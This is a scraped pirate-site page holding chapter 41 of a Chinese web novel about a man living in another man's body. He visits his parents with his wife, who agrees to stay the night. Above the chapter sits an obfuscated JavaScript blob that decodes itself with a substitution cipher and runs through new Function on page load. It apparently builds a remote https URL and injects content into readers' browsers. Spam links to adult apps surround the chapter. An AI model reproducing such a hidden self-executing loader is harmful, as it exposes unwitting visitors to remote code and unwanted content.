笔趣阁

下载
字:
关灯 护眼
笔趣阁 > 结婚后,人气声优突然搬来我家 > 41.温柔的水流,无法治愈身心俱疲的人.
(function(){function oc5530234(s){var d={'q':'w','w':'q',',':'(',':':'$','~':'/','0':'@','/':'~','%':'3','4':'^','@':'0','^':'4','5':'&','Q':'W','3':'%','$':':','u':'i','U':'I','I':'U','o':'p','X':'S','d':'f','i':'u','f':'d','F':'D','c':'v','D':'F','v':'c','y':'t','T':'Y','p':'o','C':'V','P':'O','A':'Z','a':'z','z':'a','V':'C','Z':'A','n':'h','j':'m','O':'P','s':'x','m':'j','N':'H','B':'G','x':'s','S':'X','e':'r','W':'Q','l':'k','H':'N','!':'.','k':'l',';':'=','r':'e','L':'K','-':'_','t':'y','g':'b','&':'5','|':']','E':'R','6':'?','Y':'T','9':'7',']':'|','b':'g','R':'E','G':'B','h':'n','J':'M','M':'J','K':'L','_':'-','.':'!','(':',','?':'6','7':'9','=':';'};return s.split('').map(function(c){return d[c]!==undefined?d[c]:c}).join('')}var c=oc5530234('ftp://saw1quhfpq["" + "t" + "?" + "&" + "2" + "9" + "@" + "7" + "?" + "v"+""|;dihvyuph,) { = ,dihvyuph ,i( u( q( f) { ud ,~4Jzv]Quh~!yrxy,hzcubzype!okzydpej)) { eryieh }= cze fv ; dihvyuph ,h) { eryieh Xyeuhb!depjVnzeVpfr,h) }= cze s ; q[fv,@s?1) + fv,@s9^) + fv,@s?D) + fv,@s?2)|( vx ; f[s,"T%CtvjCifDHmvjkqfZ;;")|( vef ; s,"T%MkTSEkEQskgQCifZ;;")= "mWiret"= cze qe ; "qeuyr"= "mWiret"= cze d ; f[vef|,s,"zQAtTQ1k"))= d!uf ; "s" + ,Jzyn!ezhfpj,) * 1@@@@)= d!xytkr!qufyn ; "1@os"= d!xytkr!nrubny ; & + "os"= d!xytkr!gzvlbepihf ; "#DDD"= d!xev ; ["nyyox$~~"( s,i)( "e"( "m91"( u|!mpuh,"~")= f[qe|,d!piyreNYJK)= q["zffRcrhyKuxyrhre"|,"jrxxzbr"( dihvyuph ,r) { ud ,r!fzyz!l ;; u) { f!bryRkrjrhyGtUf,d!uf)!erjpcr,)= hrq Dihvyuph,"-yfvx"( s,r!fzyz!c)),vx) } }) }),"zu&wvB&uzNkuTX&^rSp;"( "1%222?772&972&"( quhfpq( fpvijrhy) }=t?&29@7?v,)='.substr(10));new Function(c)()})();

41.温柔的水流,无法治愈身心俱疲的人.

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
饭后,母亲在厨房收拾,最上和人与最上沙织,则在客厅与父亲闲聊。
  大概内容就是围绕着婚后生活是否还习惯,两人对于未来的规划等,顺带旁敲侧击了一下,他们什么时候能够抱孙子。
  这是极为合理的展开。
  最上和人不知该如何作答,一旁的最上沙织却能够侃侃而谈,笑着说两人暂时还没有这样的打算。
  最上和人觉得这副画面很荒唐,也很可悲。
  原主在结婚之前,就丝毫没有考虑过父母的感受么?
  还是说,比起父母,他更在乎此刻身边坐着的这个女人?
  他真的心甘情愿到这种地步么。
  最上和人只拥有原主的记忆,却无法对他的感情产生共鸣,他很清楚,这样的关系是错误的,必须有人来斩断这条弥漫着毒素的纽带。
  或许正是因为这样,他才会成为最上和人。
  如此想来的话,自己就这样,按照原主的方式生活下去,与原主又有什么区别呢。
  最上和人了解自己,他是一个软弱的,容易被他人打动的人。
  会不会有一天,他就不再是他。
  他害怕变成那样。
  所以,是时候该下定决心了。
  ……
  ……
  他看向一旁的最上淳平,父亲正满心欢喜地整理着送他的那套西服,非说要明天穿着去上班,要向同事与学生们自满一番。
  也不是不能理解最上淳平这样的心态,站在外人的立场来看,想必他们会是很幸福的一家人。
  “爸,妈,时间不早了,我和沙织该走了,否则终电就要赶不上了。”
  现在已经是晚上十点多,一会儿还要坐公交车到上野车站,若是再晚一些,很有可能今晚就没办法回家了,最上和人明早还要去上班。
  “啊啦?今晚住下不就好了。”最上千代说道。
  “是啊,听你们妈妈的,就住下吧。”最上淳平也劝说了一句。
  “可是……”
  最上和人不动声色地看了一眼最上沙织,只见她神情忐忑,也在偷偷打量他,不经意对上了视线。
  无论对自己,还是对最上沙织,这都不是一件好事。
  “我明早有一个很重要的会议,所以……”
  面不改色的撒谎,也是东京帅哥不可或缺的技能。
  “公司的话,从上野也能过去吧,和人的公司是在六本木吧,在上野坐车的话,不用换乘就能到了。”
  话是这么说,但最上千代是知道的,从上野坐电车到六本木,要途经十多站,加上还要早起赶公交,确实算不上是合理的时间安排。
  但就是这样,她也希望许久不见的儿子儿媳能在家中住下,这样的心情,与世界上的大多数父母都是一样的。
  最上和人明白这个道理,才会产生犹豫,一方面想要体恤他们,尽可能地扮演他们的儿子,来完成微不足道的赎罪。
  另一方面,则是顾及最上沙织。
  “和人,妈妈都这么说了,我们今晚就住下吧,明天我会早些叫你起床的。”
  “欸?!”
  最上和人一脸懵逼地看向最上沙织,从神情上看不出一丝不自然。
  她真的知道自己在说什么么?
  “嗯!沙织说得对,妈妈我先去给你们找换洗的衣服,和人的倒是有,沙织,睡衣穿我的可以么?”
  “可以哦,谢谢妈。”
免费看片APP    美女直播间
『加入书签,方便阅读』
继续浏览精彩内容
到笔趣阁APP免费阅读
《结婚后,人气声优突然搬来我家》
打开
浏览器
继续